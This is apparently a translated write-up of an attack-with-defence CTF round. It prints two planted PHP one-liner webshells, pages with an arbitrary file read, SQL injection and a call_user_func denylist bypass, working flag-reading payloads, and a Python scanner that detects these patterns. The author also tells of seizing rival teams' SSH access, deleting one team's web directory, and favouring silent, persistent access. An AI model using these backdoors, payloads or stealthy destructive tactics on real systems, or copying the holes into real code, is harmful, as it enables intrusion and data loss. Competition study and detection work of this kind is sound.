After some time, our company achieved good results in the competition. The competition was split into theory questions and AWD: theory in the morning, AWD in the afternoon. The theory part was relatively simple; right after finishing it I thought we could take first place, but unexpectedly one team scored higher than us. On to the AWD in the second half.
The AWD format is a network melee: each team maintains one server (a Linux host), and the account assigned to each team is not root but a low-privilege user (www-data, ctf, etc.). During the game each team must harden the vulnerabilities (web, binary, etc.) in its own server (hardening is allowed for the whole game) and, within the specified time (30 minutes after the start of the game), attack the other teams' hosts through those vulnerabilities to obtain flags and score.
Before the competition I prepared a WAF and file monitoring for defense, and did basics such as changing the ssh login password and backing up the website. Because the competition environment is a pure intranet, I prepared an intranet messaging tool, Feiqiu, in advance. The first 30 minutes were for hardening: there were 10 php pages, and two one-sentence trojans (one-liner webshells) were found in invest.php and .config.php.
invest.php
<?php
// One-sentence trojan: evaluates whatever arrives in the 'liumang' request parameter.
@eval($_REQUEST['liumang']);
?>
.config.php
<?php
// Second backdoor: the 'str' parameter is concatenated into source text and eval'd.
$str = @(string)$_GET['str'];
eval('$str="' . addslashes($str) . '";');
?>
The WAF was not enabled for the time being because it might affect website services. Ebank.php reads an arbitrary file: it can be hit with GET message=/flag.
Ebank.php
<?php
// getParsedBody() and $content_type are defined elsewhere in the original file.
if (isset($_POST['message'])) {
    $message = getParsedBody($content_type, $_POST['message']);
    $message = urlencode($message);
    echo "<script>confirm('请确认您的留言:{$message}');</script>"; // "please confirm your message"
} elseif (isset($_GET['message'])) {
    // The GET branch hands the parameter straight to file_get_contents(): arbitrary file read.
    $message = getParsedBody($content_type, file_get_contents($_GET['message']));
    $message = urlencode($message);
    echo "<script>confirm('请确认您的留言:{$message}');</script>";
}
?>
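The file monitoring mentioned above never got done (see the summary at the end). As an added example that is not from the original post, here is a small Python scanner for the exact patterns found during hardening: eval() fed directly from a request superglobal (invest.php), a request-tainted variable flowing into eval() (.config.php), file_get_contents() on request input (Ebank.php), and call_user_func() on a variable. The SAMPLES dictionary is constructed for the demo; file names and contents are modelled on the write-up, not copied from the real challenge.

```python
"""Static scan of PHP sources for the backdoor and file-read patterns seen in this AWD round."""
import re
import sys
from pathlib import Path

# Constructed sample files modelled on the write-up (not the real challenge sources).
SAMPLES = {
    "invest.php": "<?php @eval($_REQUEST['liumang']); ?>",
    ".config.php": "<?php\n$str=@(string)$_GET['str'];\neval('$str=\"'.addslashes($str).'\";');\n?>",
    "Ebank.php": "<?php\nif (isset($_GET['message'])) {\n    $m = file_get_contents($_GET['message']);\n}\n?>",
    "index.php": "<?php echo date('Y-m-d'); ?>",
}

SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\["
RULES = [
    ("eval-on-request", re.compile(r"\beval\s*\(\s*" + SUPERGLOBAL)),
    ("file-read-from-request", re.compile(r"\bfile_get_contents\s*\(\s*" + SUPERGLOBAL)),
    ("dynamic-call-on-variable", re.compile(r"\bcall_user_func\s*\(\s*\$")),
]


def scan_source(src: str) -> list[str]:
    """Return the names of the rules that fire on one PHP source string."""
    findings = [name for name, pat in RULES if pat.search(src)]
    # Cheap single-file taint pass: variables assigned from a request superglobal ...
    tainted = set(re.findall(r"\$(\w+)\s*=[^;]*" + SUPERGLOBAL, src))
    # ... that later appear inside an eval() argument, as in the .config.php backdoor.
    for m in re.finditer(r"\beval\s*\(([^;]*)\)", src):
        hits = [t for t in tainted if re.search(r"\$" + t + r"\b", m.group(1))]
        if hits:
            findings.append("eval-with-tainted-var:" + ",".join(sorted(hits)))
    return findings


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Scan every .php file under root; pathlib's glob also matches dotfiles like .config.php."""
    return {str(p): f for p in root.rglob("*.php") if (f := scan_source(p.read_text(errors="ignore")))}


def scan_samples() -> dict[str, list[str]]:
    """Run the rules over the constructed samples; only files with findings are reported."""
    return {name: f for name, src in SAMPLES.items() if (f := scan_source(src))}


if __name__ == "__main__":
    report = scan_tree(Path(sys.argv[1])) if len(sys.argv) > 1 else scan_samples()
    for path, findings in report.items():
        print(f"{path}: {', '.join(findings)}")
```

Run it against the web root at the start of the hardening window and again periodically; a new file that trips a rule is a webshell candidate to inspect.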
When the 30 minutes of hardening ended, the attack phase began. I tried the injection in Record.php with SQLMAP but it failed; you need to save the request to a file with Burp (BP) and feed that file to SQLMAP.
<?php
// Record.php (excerpt): $con is the mysqli connection opened elsewhere in the file.
if (isset($_POST['rate'])) {
    $rate = $_POST['rate'];
    // Only 'sleep' and 'benchmark' are filtered; $rate still goes into the query unescaped.
    if (stristr($rate, 'sleep') || stristr($rate, 'benchmark')) {
        die("error");
    }
    $sql = "INSERT INTO rate(`rates`) values('$rate')";
    $result = mysqli_query($con, $sql); //or die(mysqli_error());
    $sql_query = "SELECT LAST_INSERT_ID()";
    $result = mysqli_query($con, $sql_query);
    while ($row = mysqli_fetch_array($result)) {
        die("汇率新建成功,汇率编号:" . $row[0]); // "rate created, rate id: ..."
    }
    mysqli_close($con);
}
Systemtime.php had both an XSS and a reflection-style injection; I was blind enough to see the XSS but not the injection, and only realized it at the very end after the referee's hint: POST func=file_get_contents&p=/flag.
<?php
// Denylist of function names; anything not listed can still be reached through call_user_func().
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo",
    "popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert",
    "substr_replace","call_user_func_array","call_user_func","array_filter","array_walk","array_map",
    "registregister_shutdown_function","register_tick_function","filter_var","filter_var_array",
    "uasort","uksort","array_reduce","array_walk","array_walk_recursive","pcntl_exec","fopen",
    "fwrite","file_put_contents");
function gettime($func, $p) {
    $result = call_user_func($func, $p); //=file_get_contents("/flag")
    $a = gettype($result);
    if ($a == "string") {
        return $result;
    } else {
        return "";
    }
}
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func, $disable_fun)) {
        echo gettime($func, $p);
    } else {
        die("当前为系统配置功能,禁止瞎搞。"); // "this is a system configuration function, no messing around"
    }
}
The key move was that, using our smart brains, we tried to change the other teams' ssh passwords the moment the 30 minutes were up, got two servers, and made a bold move: we deleted one team's HTML directory, taking their service down and costing them points. After a while, though, they took the SSH access back; we later learned they had used their one environment restore. We should have quietly made a lot of money from that side, and on reflection an attack really should be carried out in silence, so the victim may not even notice that the password has been changed, the way another team "paid tribute" to us every 15 minutes.
Summary of some of the game's minor problems:
1. The intranet communication tool was intermittent, with large delays, and sometimes completely unavailable.
2. There was no python environment, so file monitoring was not done.
3. Traffic monitoring was not ready.
4. No log analysis was performed; logs were only viewed with tail.
5. No junk-traffic attack was done.